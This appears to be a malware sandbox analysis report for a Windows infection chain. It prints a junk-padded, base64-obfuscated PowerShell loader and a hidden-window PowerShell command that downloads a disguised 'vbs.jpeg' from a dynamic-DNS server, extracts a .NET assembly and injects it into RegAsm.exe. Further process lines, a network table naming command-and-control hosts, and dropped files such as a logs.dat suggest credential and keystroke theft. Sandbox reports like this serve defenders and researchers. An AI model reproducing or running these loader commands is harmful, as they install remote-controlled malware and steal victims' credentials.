⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴dQBi≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴By≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴Ew≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴WwBT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴ZQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴XQ≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴RgBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBC≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQBk≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bb≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴eQBz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴ZQBt≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bl≩ 
⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bg≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQBd≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴OgBM≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴EI≩ ⫻ ㏤ ≪ ㏴eQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YgBs≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BU≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴E8≩ ⫻ ㏤ ≪ ㏴LgBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBl≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴7≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bt≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BN≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴VgBB≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴bwBr≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴bwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴WwBd≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴B4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBC≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴UgBU≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴O≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴4≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴NQ≩ ⫻ ㏤ ≪ ㏴z≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lg≩ ⫻ ㏤ ≪ ㏴y≩ ⫻ ㏤ ≪ ㏴Dk≩ ⫻ ㏤ ≪ ㏴MQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴DM≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴x≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ 
㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBS≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkoyhe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtjhwxlv"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | 135.192.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | wemberdag.duckdns.org | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | 99.116.186.103.in-addr.arpa | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jzzr1ur.xhg.ps1
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\CSC808E1BBE59894277B6474D5926CDD25.TMP
C:\Users\Admin\AppData\Local\Temp\RES9877.tmp
C:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.dll
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Roaming\logs\logs.dat
C:\Users\Admin\AppData\Local\Temp\rkoyhe